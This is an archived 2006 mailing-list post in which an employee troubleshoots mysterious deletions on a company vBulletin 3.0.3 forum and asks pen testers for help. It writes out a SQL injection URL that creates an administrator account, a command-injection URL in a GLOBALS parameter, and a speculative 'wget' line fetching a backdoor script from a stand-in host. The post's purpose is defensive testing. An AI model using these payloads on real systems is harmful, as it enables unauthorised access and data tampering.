testing vulnerable web application.
- From: Dave <fla.tech.talk@xxxxxxxxx>
- Date: Sun, 25 Jun 2006 22:41:51 -0400
pen testers,
Our companies website hosts a forum program called vBulletin 3.0.3. A few recent incidents (i.e. threads vanishing, user accounts deleted) has us looking into how this is happening. Our manager wants to solve this problem 'in house' so the task was given to me and another employee to see if we can figure out how this is happening and stop it.
1) We have closely monitored all (co)admin and moderators activities and this has revealed nothing out of the ordinary.
2) We restored the DB content using a backup and within 2 days the threads and accounts in question were gone again.
3) We downloaded and installed a patch from vbulletin.com that was supposed to secure the application but this has not stopped the problem.
We assumed the attacker was using some sort of SQL injection to alter the DB records or possibly he can craft a SQL query in a way that will create an admin account to use to simply log in and alter the records and then delete his username...NO rogue admin accounts have ever been found.
1) We searched the bugtraq lists at securityfocus.com and packetstorm for known SQL vulns for vBulletin
2) We set up a test server to test our theories without damaging the actual DB or interrupting normal business. The options granted to our vbulletin DB user are SELECT,UPDATE,ALTER,INSERT and DELETE so we set up our test DB with the same permissions etc...
In our search for possible vulns we came across these links:
http://packetstormsecurity.nl/0509-exploits/20050917-vbulletin-3.0.8.txt
When we try to test these POC snippets we dont get results. Examples we have tried:
USING example : admincp/user.php?do=find&orderby=username&limitnumber=[SQL] we crafted a URL:
http://192.168.6.99:8080/vb-forums/admincp/user.php?do=find&orderby=username&limitnumber=[INSERT%20INTO%20user%20VALUES('12345',%20'6',%20'',%20'0',%20'admintest',%20'5f376e00eb11f00d0262636a5b699501',%20'2006-06-25',%20'nospam@xxxxxxxxxx',%20'0',%20'',%20'',%20'',%20'',%20'',%20'2',%20'Administrator',%20'0',%20'1151266933',%20'0',%20'1151272079',%20'1151274578',%20'1151267867',%20'1',%20'10',%20'1',%20'',%20'0',%20'0',%20'0',%20'2135',%20'',%20'0000-00-00',%20'-1',%20'1',%20'',%20'0',%20'0',%20'',%20'0',%20'0',%20'-1',%20'0',%20'0',%20'$Nu')]
The syntax for this SQL was obtained from the backup.sql file created by vBulletin. In theory this would create an account with following values:
userid = 12345
usergroupid = 6
username = admintest
password = 5f376e00eb11f00d0262636a5b699501 this = "password"
passworddate = 2006-06-25
email = nospam@xxxxxxxxxx
styleid = 0
usertitle = Administrator
reputation = 10
reputationlevelid = 1
options = 2135
salt = $Nu
Another example we tried:
URL of vuln listing: http://packetstormsecurity.nl/0502-exploits/vbulletin-3.0.4-2.txt
Reading this we wondered if the attacker was possibly running a command on the server (such as wget http://foobar.com/backdoor.script) then using this backdoor script he is able to view source code of DB related scripts to obtain info for DB access etc...
We have tried using both the POC code and self crafted URL's like:
http://192.168.6.99:8080/vb-forums/forumdisplay.php?GLOBALS[]=1&f=1&comma=".`echo _START_`.`'touch test.txt'`.`echo _END_`."
> then
http://192.168.6.99:8080/vb-forums/test.txt > 404 error file not found
This is just a small list of unfruitful examples gathered during a rather exhaustive effort to exploit this application. To date we were not able to successfully exploit the vBulletin application using any of the available POC code snippets. We were hoping that someone out there who is more proficient at this line of work could shed some light on our situation and possibly point us in the right direction.
Thanks in advance for any suggestions.
Dave
------------------------------------------------------------------------------
This List Sponsored by: Cenzic
Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request@xxxxxxxxxx for details.
------------------------------------------------------------------------------
- Follow-Ups:
- Re: testing vulnerable web application.
- From: Steven
- Re: testing vulnerable web application.
- From: Rogan Dawes
- Re: testing vulnerable web application.
- Prev by Date: Re: DEP on XP
- Next by Date: Re: RE: Online Fraud Protection
- Previous by thread: DEP on XP
- Next by thread: Re: testing vulnerable web application.
- Index(es):
Relevant Pages
|
